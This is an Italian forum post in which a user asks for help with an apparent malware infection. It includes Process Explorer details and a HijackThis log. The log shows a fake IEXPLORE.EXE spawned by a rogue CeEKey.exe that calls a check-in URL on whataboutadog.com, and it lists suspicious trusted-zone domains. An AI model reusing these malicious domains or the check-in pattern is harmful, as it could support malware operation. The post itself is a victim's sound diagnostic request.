anzitutto, volevo fornirti un altro dato:
ho voluto analizzzare con Process Explorer i dettagli dei processi attivi, in particollare lo sdoppiamento del processo IEXPLORE.EXE
Non sono pratico nemmeno di ProcessExplorer, ma ho notato almeno 2 dettagli aprendo le Proprietà dei due processi omonimi:
codice:
- IEXPLORE.EXE autentico (Properties > Image):
Path: C:\Program Files\Internet Explorer\IEXPLORE.EXE
Command Line: "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
Parent: explorer.exe(2948)
- IEXPLORE.EXE fasullo:
Path: c:\program files\internet explorer\iexplore.exe
Command Line: http://b.whataboutadog.com/123/checkin.php?cid=34340978&aid=10258&time=C:\DOCUME~1\miocomputer\LOCALS~1\Temp\\1191002468.dat&fw=2112&v=123&m=0&vm=0
Parent: CeEKey.exe(3108)
Quest'ultimo "CeEKey.exe" è realtivo a "C:\Program Files\TOSHIBA\E-KEY\bak\CeEKey.exe"
...per il resto, dll e chiavi registro connesse a tali processi, non ci capisco molto.
Ecco, poi, il log di HijackThis...però devo dirti che, lanciando "Do system scan and save log file", ho ricevuto un messaggio:
For some reason your system denied write access to the Hosts file. If any hijacked domains are in this file, HijackThis may not be able to fix this.
If that happens, you need to edit the file yuorself. To do this, click Start, Run and type:
notepad C:\WINDOWS\System32\drivers\etc\hosts
and press Enter. Find the line(s) HijackThis reports and delete them. Save the file as "hosts." (with quotes), and reboot.
For VISTA: simply exit HijackThis, right-click on the HijackThis icon, choose "Run as an Administrator"
a parte questo avviso, che non ho ben capito, ti copio il log che ho ottenuto (ho cancellato l'indirizzo della rete aziendale):
codice:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 23.31.21, on 28/09/2007
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal
Running processes:
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\System32\TCtrlIOHook.exe
C:\Program Files\CheckPoint\SecuRemote\bin\SR_GUI.exe
C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe
C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
C:\Program Files\TOSHIBA\E-KEY\bak\CeEKey.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
c:\program files\internet explorer\iexplore.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.it
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe
O4 - HKLM\..\Run: [TCtryIOHook] TCtrlIOHook.exe
O4 - HKLM\..\Run: [TFncKy] TFncKy.exe
O4 - HKLM\..\Run: [CeEKEY] C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
O4 - HKLM\..\Run: [PestPatrol Control Center] C:\Program Files\PestPatrol\PPControl.exe
O4 - HKLM\..\Run: [Realtime Monitor] C:\PROGRA~1\CA\ETRUST~1\realmon.exe -s
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [DrvMon.exe] C:\WINDOWS\System32\DrvMon.exe
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: PC Health.lnk = C:\Program Files\TOSHIBA\TOSHIBA Management Console\TOSHealthLocalS.vbs
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O15 - Trusted Zone: http://rete.[rete aziendale].it
O15 - Trusted Zone: *.whataboutadog.com
O15 - Trusted Zone: *.whataboutarabit.com
O15 - Trusted Zone: http://rete.[rete aziendale].it (HKLM)
PS:
controllando, ho trovato molti files di sistema doppi (uno nella relativa cartella, e il doppione in una sottocartella BAK...e spesso hanno dimensioni diverse anche se identica data di creazione) ???
Rispondi quotando
